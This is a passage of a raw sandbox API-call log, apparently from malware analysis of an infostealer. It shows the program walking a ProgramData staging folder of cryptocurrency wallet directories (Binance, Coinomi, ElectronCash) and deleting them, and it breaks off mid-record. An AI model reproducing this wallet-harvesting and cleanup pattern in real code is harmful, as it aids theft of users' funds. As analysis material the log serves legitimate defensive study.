ftLastWriteTime.dwLowDateTime=0x3633fa9b, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.509] lstrcpyW (in: lpString1=0x19dd88, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance" [0116.509] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance\\" [0116.510] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance\\", lpString2=".." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance\\..") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance\\.." [0116.510] lstrcpyW (in: lpString1=0x19df90, lpString2="\\Wallets\\Binance" | out: lpString1="\\Wallets\\Binance") returned="\\Wallets\\Binance" [0116.510] lstrcatW (in: lpString1="\\Wallets\\Binance", lpString2="\\" | out: lpString1="\\Wallets\\Binance\\") returned="\\Wallets\\Binance\\" [0116.510] lstrcatW (in: lpString1="\\Wallets\\Binance\\", lpString2=".." | out: lpString1="\\Wallets\\Binance\\..") returned="\\Wallets\\Binance\\.." [0116.510] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0116.510] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0116.510] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3633fa9b, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3633fa9b, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3633fa9b, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0116.510] FindClose (in: hFindFile=0x7436e0 | out: hFindFile=0x7436e0) returned 1 [0116.510] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a36d0 [0116.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0116.510] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3f) returned 0x29a2d68 [0116.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance", cchWideChar=63, lpMultiByteStr=0x29a2d68, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance", lpUsedDefaultChar=0x0) returned 63 [0116.510] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2c00 [0116.510] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2d68 | out: hHeap=0x29a0000) returned 1 [0116.510] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a36d0 | out: hHeap=0x29a0000) returned 1 [0116.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19ed40, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0116.510] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8) returned 0x29a6998 [0116.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19ed40, cbMultiByte=4, lpWideCharStr=0x29a6998, cchWideChar=4 | out: lpWideCharStr="*.*") returned 4 [0116.510] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6998 | out: hHeap=0x29a0000) returned 1 [0116.510] PathMatchSpecW (pszFile="Binance", pszSpec="*.*") returned 1 [0116.511] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a36d0 [0116.511] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x3970f78 [0116.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0116.511] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3f) returned 0x29a2cd8 [0116.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance", cchWideChar=63, lpMultiByteStr=0x29a2cd8, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance", lpUsedDefaultChar=0x0) returned 63 [0116.511] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2d68 [0116.511] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2cd8 | out: hHeap=0x29a0000) returned 1 [0116.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Wallets\\Binance", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0116.511] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x11) returned 0x3970dc0 [0116.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Wallets\\Binance", cchWideChar=17, lpMultiByteStr=0x3970dc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\Wallets\\Binance", lpUsedDefaultChar=0x0) returned 17 [0116.511] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970448 [0116.511] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970dc0 | out: hHeap=0x29a0000) returned 1 [0116.511] CreateFileA (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\wallets\\binance"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0116.511] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970448 | out: hHeap=0x29a0000) returned 1 [0116.511] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2d68 | out: hHeap=0x29a0000) returned 1 [0116.511] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970f78 | out: hHeap=0x29a0000) returned 1 [0116.511] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a36d0 | out: hHeap=0x29a0000) returned 1 [0116.511] DeleteFileW (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Binance" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\wallets\\binance")) returned 0 [0116.511] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c00 | out: hHeap=0x29a0000) returned 1 [0116.511] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3633fa9b, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3633fa9b, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3633fa9b, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Coinomi", cAlternateFileName="")) returned 1 [0116.512] lstrcpyW (in: lpString1=0x19e708, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets" [0116.512] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\" [0116.512] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\", lpString2="Coinomi" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi" [0116.512] lstrcpyW (in: lpString1=0x19e910, lpString2="\\Wallets" | out: lpString1="\\Wallets") returned="\\Wallets" [0116.512] lstrcatW (in: lpString1="\\Wallets", lpString2="\\" | out: lpString1="\\Wallets\\") returned="\\Wallets\\" [0116.512] lstrcatW (in: lpString1="\\Wallets\\", lpString2="Coinomi" | out: lpString1="\\Wallets\\Coinomi") returned="\\Wallets\\Coinomi" [0116.512] lstrcmpW (lpString1="Coinomi", lpString2=".") returned 1 [0116.512] lstrcmpW (lpString1="Coinomi", lpString2="..") returned 1 [0116.512] lstrcpyW (in: lpString1=0x19e198, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi" [0116.512] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi\\*.*") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi\\*.*" [0116.512] FindFirstFileW (in: lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi\\*.*", lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3633fa9b, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3633fa9b, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3633fa9b, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7436e0 [0116.512] lstrcpyW (in: lpString1=0x19dd88, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi" [0116.512] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi\\" [0116.512] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi\\", lpString2="." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi\\.") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi\\." [0116.512] lstrcpyW (in: lpString1=0x19df90, lpString2="\\Wallets\\Coinomi" | out: lpString1="\\Wallets\\Coinomi") returned="\\Wallets\\Coinomi" [0116.512] lstrcatW (in: lpString1="\\Wallets\\Coinomi", lpString2="\\" | out: lpString1="\\Wallets\\Coinomi\\") returned="\\Wallets\\Coinomi\\" [0116.512] lstrcatW (in: lpString1="\\Wallets\\Coinomi\\", lpString2="." | out: lpString1="\\Wallets\\Coinomi\\.") returned="\\Wallets\\Coinomi\\." [0116.512] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0116.512] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3633fa9b, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3633fa9b, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3633fa9b, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.512] lstrcpyW (in: lpString1=0x19dd88, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi" [0116.513] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi\\" [0116.513] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi\\", lpString2=".." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi\\..") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi\\.." [0116.513] lstrcpyW (in: lpString1=0x19df90, lpString2="\\Wallets\\Coinomi" | out: lpString1="\\Wallets\\Coinomi") returned="\\Wallets\\Coinomi" [0116.513] lstrcatW (in: lpString1="\\Wallets\\Coinomi", lpString2="\\" | out: lpString1="\\Wallets\\Coinomi\\") returned="\\Wallets\\Coinomi\\" [0116.513] lstrcatW (in: lpString1="\\Wallets\\Coinomi\\", lpString2=".." | out: lpString1="\\Wallets\\Coinomi\\..") returned="\\Wallets\\Coinomi\\.." [0116.513] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0116.513] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0116.513] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3633fa9b, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3633fa9b, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3633fa9b, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0116.513] FindClose (in: hFindFile=0x7436e0 | out: hFindFile=0x7436e0) returned 1 [0116.513] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a9188 [0116.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0116.513] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3f) returned 0x29a2df8 [0116.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi", cchWideChar=63, lpMultiByteStr=0x29a2df8, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi", lpUsedDefaultChar=0x0) returned 63 [0116.513] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a27c8 [0116.513] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2df8 | out: hHeap=0x29a0000) returned 1 [0116.513] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a9188 | out: hHeap=0x29a0000) returned 1 [0116.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19ed40, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0116.513] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8) returned 0x29a6988 [0116.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19ed40, cbMultiByte=4, lpWideCharStr=0x29a6988, cchWideChar=4 | out: lpWideCharStr="*.*") returned 4 [0116.513] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6988 | out: hHeap=0x29a0000) returned 1 [0116.513] PathMatchSpecW (pszFile="Coinomi", pszSpec="*.*") returned 1 [0116.513] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a9298 [0116.513] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x3970f78 [0116.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0116.513] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3f) returned 0x29a2df8 [0116.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi", cchWideChar=63, lpMultiByteStr=0x29a2df8, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi", lpUsedDefaultChar=0x0) returned 63 [0116.514] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a29c0 [0116.514] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2df8 | out: hHeap=0x29a0000) returned 1 [0116.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Wallets\\Coinomi", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0116.514] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x11) returned 0x3970f20 [0116.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Wallets\\Coinomi", cchWideChar=17, lpMultiByteStr=0x3970f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\Wallets\\Coinomi", lpUsedDefaultChar=0x0) returned 17 [0116.514] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39704e8 [0116.514] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970f20 | out: hHeap=0x29a0000) returned 1 [0116.514] CreateFileA (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\wallets\\coinomi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0116.514] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39704e8 | out: hHeap=0x29a0000) returned 1 [0116.514] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a29c0 | out: hHeap=0x29a0000) returned 1 [0116.514] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970f78 | out: hHeap=0x29a0000) returned 1 [0116.514] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a9298 | out: hHeap=0x29a0000) returned 1 [0116.514] DeleteFileW (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\Coinomi" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\wallets\\coinomi")) returned 0 [0116.514] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a27c8 | out: hHeap=0x29a0000) returned 1 [0116.514] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3632e935, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3632e935, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3632e935, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ElectronCash", cAlternateFileName="ELECTR~2")) returned 1 [0116.514] lstrcpyW (in: lpString1=0x19e708, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets" [0116.514] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\" [0116.514] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\", lpString2="ElectronCash" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash" [0116.514] lstrcpyW (in: lpString1=0x19e910, lpString2="\\Wallets" | out: lpString1="\\Wallets") returned="\\Wallets" [0116.514] lstrcatW (in: lpString1="\\Wallets", lpString2="\\" | out: lpString1="\\Wallets\\") returned="\\Wallets\\" [0116.514] lstrcatW (in: lpString1="\\Wallets\\", lpString2="ElectronCash" | out: lpString1="\\Wallets\\ElectronCash") returned="\\Wallets\\ElectronCash" [0116.514] lstrcmpW (lpString1="ElectronCash", lpString2=".") returned 1 [0116.514] lstrcmpW (lpString1="ElectronCash", lpString2="..") returned 1 [0116.514] lstrcpyW (in: lpString1=0x19e198, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash" [0116.515] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash\\*.*") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash\\*.*" [0116.515] FindFirstFileW (in: lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash\\*.*", lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3632e935, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3632e935, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3632e935, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7439e0 [0116.515] lstrcpyW (in: lpString1=0x19dd88, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash" [0116.515] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash\\" [0116.515] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash\\", lpString2="." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash\\.") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets\\ElectronCash\\." [0116.515] lstrcpyW (in: lpString1=0x19df90, lpString2="\\Wallets\\ElectronCash" | out: lpString1="\\Wallets\\ElectronCash") returned="\\Wallets\\ElectronCash" [0116.515] lstrcatW (in: lpString1="\\Wallets\\ElectronCash", lpString2="\\" | out: lpString1="\\Wallets\\ElectronCash\\") returned="\\Wallets\\ElectronCash\\" [0116.515] lstrcatW (in: lpString1="\\Wallets\\ElectronCash\\", lpString2="." | out: lpString1="\\Wallets\\ElectronCash\\.") returned="\\Wallets\\ElectronCash\\." [0116.515] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0116.515] FindNextFileW (in: hFindFile=0x7439e0, lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3632e935, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3632e935, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3632e935, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, 